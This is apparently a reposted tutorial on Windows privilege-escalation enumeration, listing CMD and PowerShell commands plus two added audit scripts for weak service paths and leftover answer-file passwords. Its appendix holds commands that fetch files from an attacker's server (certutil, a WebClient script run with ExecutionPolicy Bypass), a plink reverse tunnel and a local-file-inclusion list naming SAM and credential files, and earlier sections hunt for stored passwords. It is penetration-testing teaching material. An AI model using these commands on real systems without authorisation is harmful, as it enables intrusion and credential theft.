Introduction
Privilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need to know what to check and look for. This takes familiarity with systems that normally comes along with experience. At first privilege escalation can seem like a daunting task, but after a while you start to filter through what is normal and what isn’t. It eventually becomes easier to know what to look for rather than digging through everything hoping to find that needle in the haystack. Hopefully this guide will provide a good foundation to build upon and get you started.
This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
Note: I am not an expert and still learning myself.
Guide Layout
In each section I first provide the old trusted CMD commands and then also a Powershell equivalent for posterity's sake. It’s good to have both tools under your belt, and Powershell is much more versatile for scripting than the traditional CMD. However, there isn’t a Powershell equivalent for everything (or CMD is still simply easier/better on certain things), so some sections will only contain regular CMD commands.
Operating System
What is the OS and architecture? Is it missing any patches?
systeminfo
wmic qfe
Is there anything interesting in environment variables? A domain controller in LOGONSERVER?
set
Get-ChildItem Env: | ft Key,Value
Are there any other connected drives?
net use
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
Users
Who are you?
whoami
echo %USERNAME%
$env:UserName
What users are on the system? Any old user profiles that weren’t cleaned up?
net users
dir /b /ad "C:\Users"
dir /b /ad "C:\Documents and Settings" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Is anyone else logged in?
qwinsta
What groups are on the system?
net localgroup
Get-LocalGroup | ft Name
Are any of the users in the Administrators group?
net localgroup Administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Anything in the Registry for User Autologon?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Anything interesting in Credential Manager?
cmdkey /list
Can we access SAM and SYSTEM files?
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Programs, Processes, and Services
What software is installed?
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Are there any weak folder or file permissions?
Full Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Modify Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\\Users'} } catch {}}
You can also upload accesschk from Sysinternals to check for writeable folders and files.
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it? See Port Forwarding in Appendix.
tasklist /svc
tasklist /v
net start
sc query
Get-Process | ft ProcessName,Id
Get-Service
Any weak service permissions? Can we reconfigure anything? Again, upload accesschk.
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
Are there any unquoted service paths?
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
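The two findings above (broad write permissions on program folders, and unquoted service paths) are what an auditor wants to see side by side, so here is an added Powershell script that is not from the original guide. It lists auto-start services whose ImagePath is unquoted and contains spaces, or whose binary or parent folder grants write rights to Everyone, Users, or Authenticated Users; the function names, the group list and the remediation hints are my own, and reading some service ACLs needs admin rights.

```powershell
# Added audit example (not part of the original guide). Reports only; it changes nothing.
$BroadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Write, ChangePermissions and TakeOwnership are the bits that let a user alter the file;
# Modify and FullControl both contain the Write bits, so they are caught by the same mask.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # A quoted path ends at the closing quote; an unquoted one ends at the first ".exe".
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName.Trim()
}

function Test-BroadWriteAccess {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-WeakServiceBinary {
    Get-CimInstance Win32_Service -Filter "StartMode='Auto'" | ForEach-Object {
        $raw = $_.PathName
        if (-not $raw) { return }
        $exe = Get-ServiceBinaryPath $raw
        # Same heuristic as the wmic one-liner: unquoted, contains a space, not under C:\Windows\.
        $unquoted = ($raw -notmatch '^"') -and ($exe -match ' ') -and ($raw -notmatch '^[A-Za-z]:\\Windows\\')
        $writable = (Test-BroadWriteAccess $exe) -or (Test-BroadWriteAccess (Split-Path $exe -Parent))
        if ($unquoted -or $writable) {
            [pscustomobject]@{
                Name         = $_.Name
                PathName     = $raw
                UnquotedPath = $unquoted
                BroadWrite   = $writable
                Remediate    = if ($unquoted) { "Quote ImagePath under HKLM\SYSTEM\CurrentControlSet\Services\$($_.Name)" }
                               else { 'Remove the write ACE with icacls /remove' }
            }
        }
    }
}

Get-WeakServiceBinary | Format-Table -AutoSize
```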
What scheduled tasks are there? Anything custom implemented?
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
Get-ScheduledTask | ft TaskName, State
What is run at startup?
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
Is AlwaysInstallElevated enabled? I have not run across this but it doesn’t hurt to check.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Networking
What NICs are connected? Are there multiple networks?
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
What routes do we have?
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
Anything in the ARP cache?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Are there connections to other hosts?
netstat -ano
Anything in the hosts file?
C:\WINDOWS\System32\drivers\etc\hosts
Is the firewall turned on? If so what’s configured?
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
Any other interesting interface configurations?
netsh dump
Are there any SNMP configurations?
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Interesting Files and Sensitive Information
This section may be a little noisy so you may want to output commands into txt files to review and parse as you wish.
Any passwords in the registry?
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
Are there sysprep or unattend files available that weren’t cleaned up?
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
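Finding the answer files is only half the job; the cleanup question is which of them still carry a populated password block. The added Powershell function below (mine, not from the original guide) parses each unattend/sysprep XML it finds and reports the file, the section and whether the value is stored plaintext or Base64, without echoing the value itself; the function name and the remediation text are my own.

```powershell
# Added example (not part of the original guide): inventory leftover answer-file credentials.
function Find-UnattendCredential {
    param([string]$Root = 'C:\')
    Get-ChildItem -Path $Root -Include '*unattend*.xml', '*sysprep*.xml' -File -Recurse -ErrorAction SilentlyContinue |
      ForEach-Object {
        $file = $_.FullName
        try { [xml]$doc = Get-Content -LiteralPath $file -Raw -ErrorAction Stop } catch { return }
        # local-name() sidesteps the unattend namespace; this catches AutoLogon, UserAccounts and
        # AdministratorPassword blocks wherever they are nested.
        $nodes = $doc.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")
        foreach ($n in $nodes) {
            $value = ($n.SelectSingleNode("*[local-name()='Value']")).InnerText
            if (-not $value) { continue }          # empty or scrubbed block: nothing to report
            $plain = ($n.SelectSingleNode("*[local-name()='PlainText']")).InnerText
            [pscustomobject]@{
                File      = $file
                Section   = $n.ParentNode.LocalName
                Storage   = if ($plain -eq 'false') { 'Base64' } else { 'plaintext' }
                Length    = $value.Length           # reported instead of the value itself
                Remediate = 'Delete the file or strip the Password block, then rotate the account'
            }
        }
      }
}

Find-UnattendCredential | Format-Table -AutoSize
```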
If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files?
dir /a C:\inetpub
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem -Path C:\inetpub -Include web.config -File -Recurse -ErrorAction SilentlyContinue
What’s in the IIS Logs?
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
Is XAMPP, Apache, or PHP installed? Are there any XAMPP, Apache, or PHP configuration files?
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
Any Apache web logs?
dir /s access.log error.log
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Any interesting files to look at? Possibly inside User directories (Desktop, Documents, etc)?
dir /s *pass* == *vnc* == *.config* 2>nul
Get-Childitem -Path C:\Users -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
Files containing password inside them?
findstr /si password *.xml *.ini *.txt *.config 2>nul
Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
Appendix
Transferring Files
At some point during privilege escalation you will need to get files onto your target. Below are some easy ways to do so.
Powershell Cmdlet (Powershell 3.0 and higher)
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
Powershell One-Liner
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename")
Powershell Script
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Non-interactive FTP via text file. Useful for when you only have limited command execution.
echo open 10.10.10.11 21> ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET filename>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
CertUtil
certutil.exe -urlcache -split -f https://myserver/filename outputfilename
Port Forwarding
This is useful for exposing inside services that aren’t available from outside the machine, normally due to firewall settings.
Upload plink.exe to target.
Start SSH on your attacking machine.
For example to expose SMB, on the target run:
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
Note: As of the Fall Creators Update for Windows 10, OpenSSH has been introduced in beta for Windows, so I expect one day we may be able to use just regular old SSH commands for port forwarding, depending on if it’s enabled.
Local File Inclusion List
This is not an exhaustive list; installation directories will vary, and I’ve only listed common ones.
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
This article was first published on the WeChat official account (DMZLab): [Repost] Windows Privilege Escalation Guide